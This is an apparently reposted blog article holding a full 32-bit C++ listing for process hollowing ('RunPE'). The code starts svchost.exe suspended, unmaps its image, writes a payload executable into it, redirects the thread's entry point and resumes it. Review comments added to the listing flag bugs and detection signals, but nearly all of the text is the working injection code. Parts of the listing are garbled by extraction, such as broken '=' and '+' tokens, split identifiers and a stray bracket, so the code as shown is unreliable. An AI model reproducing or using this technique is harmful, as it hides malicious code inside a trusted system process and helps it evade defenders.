Injecting a PE into svchost.exe on Windows 7 via process hollowing ("RunPE") — repost

Injecting a PE into svchost.exe on Windows 7 via process hollowing ("RunPE") — repost

The approach is the same as on other Windows versions. Note that this listing is 32-bit (x86) only: it drives the suspended thread through the Eax/Ebx/Eip fields of CONTEXT and writes a 4-byte image base into the PEB. The listing below was extracted from an HTML page and carries several artifacts (curly quotes, `& # 61;` for `=`, `& # 43;` for `+`, split identifiers, a dropped `<` in the section loop); they are pointed out in the comments rather than silently rewritten.

//VC-Win32
#define _WIN32_WINNT 0x0501
#define WIN32_LEAN_AND_MEAN

#pragma comment(lib,”ntdll.lib”)

#include //sprintf
#include //garbage 1
#include //garbage 2
#include //return codes
#include //NTSTATUS

// NOTE(extraction): the curly quotes on this line and on the #pragma above are an
// artifact of the page conversion; the original used plain double quotes. The literal
// carries an explicit "\0", which sprintf() in set_target() stops at anyway.
#define TARGETS_0 “svchost.exe\0”

// Prototypes for native ntdll exports that the public SDK headers do not declare; they
// resolve through ntdll.lib (see the #pragma comment above). The #include lines above
// lost their <header> names in extraction; only the author's trailing hints survive.
// Extraction also split two identifiers below: `PU LONG` is PULONG and
// `ZwUnmapViewOf Section` is ZwUnmapViewOfSection.
// NOTE(review): byte counts are declared as ULONG here; the native signatures take
// SIZE_T (same width on x86, wider on x64), so these declarations are only correct for
// the 32-bit build this listing targets.
extern “C”
{
PIMAGE_NT_HEADERS __stdcall RtlImageNtHeader( IN PVOID ModuleAddress );
NTSTATUS __stdcall NtGetContextThread( IN HANDLE ThreadHandle, OUT PCONTEXT pContext );
NTSTATUS __stdcall NtReadVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG NumberOfBytesToRead, OUT PULONG NumberOfBytesReaded OPTIONAL );
NTSTATUS __stdcall NtWriteVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN PVOID Buffer, IN ULONG NumberOfBytesToWrite, OUT PULONG NumberOfBytesWritten OPTIONAL );
NTSTATUS __stdcall NtProtectVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PU LONG NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection );
NTSTATUS __stdcall NtSetContextThread( IN HANDLE ThreadHandle, IN PCONTEXT Context );
NTSTATUS __stdcall NtResumeThread( IN HANDLE ThreadHandle, OUT PULONG SuspendCount OPTIONAL );
NTSTATUS __stdcall ZwUnmapViewOf Section( IN HANDLE ProcessHandle, IN PVOID BaseAddress );
};

// Command line of the process to hollow. Filled by set_target() and passed as the
// (writable) lpCommandLine argument of CreateProcessA in fork_system_file(); that is
// why it is a mutable buffer rather than a string literal.
char target[MAX_PATH];

// Fills the global `target` with the command line of the process to hollow.
// Only one candidate is compiled in (TARGETS_0, a bare "svchost.exe"), so the
// switch is a placeholder for a random pick: srand() is seeded from our PID but
// nothing in this function consumes the RNG.
// NOTE(review): the name carries no directory, so CreateProcessA later resolves
// it by its own search rules instead of a pinned System32 path.
void __stdcall set_target(void)
{
srand(GetCurrentProcessId());

const char* picked;
switch (0)
{
default:
case 0:
    picked = TARGETS_0;
    break;
}

// "%s" keeps the format string a literal; TARGETS_0 contains no '%', so the
// result is byte-for-byte what the original sprintf(target, TARGETS_0) wrote.
sprintf(target, "%s", picked);
}

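// Enables SeDebugPrivilege on the current process token.
// Returns TRUE only if the privilege was actually enabled; FALSE otherwise.
//
// Why the checks: the original ignored every return value, so on a token that does
// not hold SeDebugPrivilege (non-admin, or admin without elevation) it silently
// "succeeded", and if OpenProcessToken failed, an uninitialized hToken was passed to
// CloseHandle. Callers that ignore the result (fork_system_file) still compile.
// NOTE(review): the handles CreateProcessA hands back for a child this process creates
// presumably already carry full access, so this privilege may only matter if the target
// were opened rather than created — confirm before relying on it.
BOOL __stdcall GainPrivileges(void)
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;

    LUID luid;
    if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &luid))
    {
        CloseHandle(hToken);
        return FALSE;
    }

    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // AdjustTokenPrivileges returns TRUE even when none of the requested privileges
    // could be enabled; that case is only visible as ERROR_NOT_ALL_ASSIGNED.
    BOOL ok = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    if (ok && GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        ok = FALSE;

    CloseHandle(hToken);
    return ok;
}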

// Process hollowing ("RunPE", MITRE ATT&CK T1055.012): starts `target` (set by
// set_target(), a bare "svchost.exe") suspended, unmaps what it takes to be the
// child's original image, copies the PE held in `file` into the child at that
// image's preferred base, points the PEB image base and the primary thread's EIP
// at the new entry point, and resumes it. `file` is the raw on-disk PE exactly as
// WinMain read it, not a mapped image.
//
// Review notes (code left as-is; extraction artifacts are flagged inline):
//  - No return value is checked anywhere. A failed CreateProcessA, VirtualAllocEx or
//    Nt* call goes unnoticed and later calls operate on NULL/garbage handles and
//    addresses; the FatalAppExitA paths leave the suspended child behind.
//  - 32-bit (x86) only: Eax/Ebx/Eip, a 4-byte image-base write into the PEB, and the
//    ULONG byte counts in the Nt* prototypes above.
//  - pi.hProcess / pi.hThread are never closed; the three `new BYTE[]` buffers near
//    the end are never freed.
//  - Relocations are never applied, so the payload only works at its preferred base.
//  - From a detection standpoint this is the call sequence hollowing detections are
//    commonly built on: CreateProcess(CREATE_SUSPENDED) -> NtUnmapViewOfSection ->
//    NtWriteVirtualMemory into the child -> PEB image-base rewrite ->
//    NtSetContextThread -> NtResumeThread.
void __stdcall fork_system_file(void* file)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
SECURITY_ATTRIBUTES st;
SECURITY_ATTRIBUTES sp;
memset(&si,0,sizeof(STARTUPINFO));
memset(&pi,0,sizeof(PROCESS_INFORMATION));
memset(&st,0,sizeof (SECURITY_ATTRIBUTES));
memset(&sp,0,sizeof(SECURITY_ATTRIBUTES));
si.cb = sizeof(STARTUPINFO);

set_target();
GainPrivileges();

// Create the host process suspended so its primary thread has not executed anything yet.
// lpApplicationName is 0 and lpCommandLine is the bare name from set_target(), so the
// executable is located by CreateProcess's search rules rather than a pinned full path.
// The 5th argument (1) is bInheritHandles = TRUE: every inheritable handle of this
// process is passed to the child. Return value unchecked.
CreateProcessA(
0,
target,
&st,
&sp,
1,
CREATE_SUSPENDED,
0,
0,
&si,
&pi
);

// NOTE(extraction): the next three lines are garbled; they read
//   HANDLE _hProcess = pi.hProcess;  HANDLE _hThread = pi.hThread;
//   CONTEXT context = {CONTEXT_FULL};
Handle _hprocess & # 61; Pi.HPROCESS;
handle _hthread & # 61; pi.hthread;
Context Context & # 61; {context_full};

// Snapshot the suspended primary thread's registers (CONTEXT_FULL requested above).
NtgetContextThread (_hThread, &context);

// Reads one pointer from the address held in Eax and unmaps whatever it points to.
// NOTE(review): the PEB write further down treats Ebx+8 as the image base; here Eax is
// dereferenced instead. Confirm which register/offset is intended — if this unmap fails
// nothing notices, since the NTSTATUS is discarded.
PVOID x;
NtReadVirtualMemory(_hProcess,PCHAR(context.Eax), &x, sizeof(x), 0);
ZwUnmapViewOfSection(_hProcess,x );

// Locate the headers of the PE to inject. NOTE(extraction): reinterpret_cast lost its
// template argument; the intent is a plain pointer copy. The message on the DOS-header
// check says IMAGE_NT_HEADERS (copy/paste); runtime strings are left untouched here.
PIMAGE_DOS_HEADER mz;
*(void**)&mz = reinterpret_cast(file);
if(!mz) FatalAppExitA(0,”! IMAGE_NT_HEADERS”);

// RtlImageNtHeader returns NULL when the buffer is not a PE image (see check below).
PIMAGE_NT_HEADERS pe;
*(void**)&pe = RtlImageNtHeader(file);
if(!pe) FatalAppExitA(0,”! IMAGE_NT_HEADERS”);

// Reserve+commit SizeOfImage at the payload's preferred ImageBase inside the child.
// No fallback: if that range is unavailable VirtualAllocEx returns NULL, and because
// `newbase` is never checked every write below then goes to address 0 + RVA.
void* newbase;
newbase = VirtualAllocEx(
_hProcess,
PVOID(pe->OptionalHeader.ImageBase),
pe->OptionalHeader.SizeOfImage,
MEM_RESERVE|MEM_COMMIT ,
PAGE_READWRITE
);

// Copy the PE headers to the new base.
NtWriteVirtualMemory(
_hProcess,
newbase,
file,
pe->OptionalHeader.SizeOfHeaders ,
0
);

// Copy each section from its file offset to its RVA, then change its protection.
// NOTE(extraction): the loop condition reads `i < pe->FileHeader.NumberOfSections`,
// each `& # 43;` is `+`, and the stray `]` before `);` is not in the original.
// NOTE(review):
//  - Every section is made PAGE_EXECUTE_READWRITE regardless of its Characteristics,
//    i.e. no W^X — an obvious memory-scanner signal.
//  - The cast on the NtProtectVirtualMemory base argument binds before the `+`, so the
//    RVA is scaled by sizeof(void*) and a local-space expression is passed where a
//    pointer to a base-address variable is expected; `&sect[i].Misc.VirtualSize` lets
//    the call write its rounded size back into the section header in `file`.
PIMAGE_SECTION_HEADER sect = IMAGE_FIRST_SECTION(pe);
for ( unsigned long i = 0; i FileHeader.NumberOfSections; i++ )
{
unsigned long oldprot;
NtWriteVirtualMemory(
_hProcess,
PCHAR(newbase) & # 43; sect[i].VirtualAddress,
PCHAR(file) + sect[i ].PointerToRawData,
sect[i].SizeOfRawData,
0
);
Nt ProtectVirtualMemory(
_hProcess,
(void**)PCHAR(newbase ) & # 43; sect[i].VirtualAddress,
&sect[i].Misc.VirtualSize,
PAGE_EXECUTE_READWRITE,
& oldprot
        ] );
}

// Rewrite the child's image base in its PEB: Ebx is taken as the PEB address of the
// fresh x86 thread and pebInfo[2] (offset 8) is presumably PEB.ImageBaseAddress.
// A 4-byte write — x86 only.
DWORD wrote;
DWORD* pebInfo = (DWORD*)context.Ebx;
NtWriteVirtualMemory(_hProcess,&pebInfo[2],&newbase,sizeof(DWORD), &wrote);

// Point the thread at the payload's entry point.
// NOTE(extraction): `= 61;` is a garbled `=`; the line reads
//   context.Eax = context.Eip = entrypoint;
unsigned long entrypoint;
entrypoint = ULONG(newbase) + pe->OptionalHeader.AddressOfEntryPoint;
context.Eax = context.Eip = 61; entrypoint;
// NOTE(review): the selectors and EFLAGS below replace values NtGetContextThread
// already captured with hard-coded constants. That is fragile across Windows
// versions/WoW64 and presumably unnecessary since the captured context is reused —
// confirm they are needed.
context.SegGs = 0;
context.SegFs = 0x38;
context.SegEs = 0x20;
context.SegDs =0x20;
context.SegSs =0x20;
context.SegCs =0x18;
context.EFlags =0x3000;

// Intended to overwrite traces in the child ("spoof"), but as written:
//  - each destination is a *local* address (&entrypoint on this stack; mz and pe
//    inside this process's file buffer) interpreted in the child's address space;
//  - the `new BYTE[]` sources are uninitialized, not zero, and are never freed;
//  - the two header writes pass sizeof(PIMAGE_*) — a pointer size — not the struct size.
// All three NTSTATUS results are discarded.
NtWriteVirtualMemory(_hProcess,&entrypoint,new BYTE[sizeof(DWORD)],sizeof(DWORD),0);
NtWriteVirtualMemory(_hProcess,mz,new BYTE[sizeof IMAGE_DOS_HEADER] ,sizeof(PIMAGE_DOS_HEADER),0);
NtWriteVirtualMemory(_hProcess,pe,new BYTE[sizeof IMAGE_NT_HEADERS],sizeof(PIMAGE_NT_HEADERS),0);

// Apply the modified context and let the primary thread run from the payload entry point.
// pi.hProcess / pi.hThread are leaked here.
NtSetContextThread (_hThread,&context);
NtResumeThread(_hThread,0);
}

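// Program entry: reads the payload PE "test3.exe" into a heap buffer and hands it
// to fork_system_file(). Returns -1 on any I/O failure, 0 otherwise.
//
// Fixes over the original: GetFileSize and ReadFile results were never checked, so an
// empty, truncated or unreadable file was passed on as if it were a complete image;
// the buffer was never freed; and the redundant SetFilePointer(FILE_BEGIN) right after
// OPEN_EXISTING is dropped (a fresh handle already starts at offset 0).
int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hinstPrev, LPSTR lpszCmdLine, int nCmdShow)
{
    // Relative path: resolved against the process's current directory, not the
    // location of this executable.
    HANDLE hFile = ::CreateFile("test3.exe",
                                GENERIC_READ,
                                0,
                                NULL,
                                OPEN_EXISTING,
                                FILE_ATTRIBUTE_NORMAL,
                                NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        MessageBox(0, "File not found", "ff", 0);
        return -1;
    }

    // INVALID_FILE_SIZE is also what a >4 GiB file reports on the low DWORD; neither
    // that nor an empty file can be a usable 32-bit PE image.
    DWORD dwFileSize = ::GetFileSize(hFile, NULL);
    if (dwFileSize == INVALID_FILE_SIZE || dwFileSize == 0)
    {
        ::CloseHandle(hFile);
        MessageBox(0, "Bad file size", "ff", 0);
        return -1;
    }

    LPBYTE pBuf = new BYTE[dwFileSize];
    memset(pBuf, 0, dwFileSize);

    DWORD dwNumberOfBytesRead = 0;
    BOOL readOk = ::ReadFile(hFile, pBuf, dwFileSize, &dwNumberOfBytesRead, NULL);
    ::CloseHandle(hFile);

    // A short read would leave fork_system_file() parsing zero-filled headers/sections.
    if (!readOk || dwNumberOfBytesRead != dwFileSize)
    {
        delete[] pBuf;
        MessageBox(0, "Short read", "ff", 0);
        return -1;
    }

    // fork_system_file() copies out of the buffer and keeps no reference to it.
    fork_system_file(pBuf);
    delete[] pBuf;
    return 0;
}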

Reposted from: https://blog.51cto.com/4225964/780098

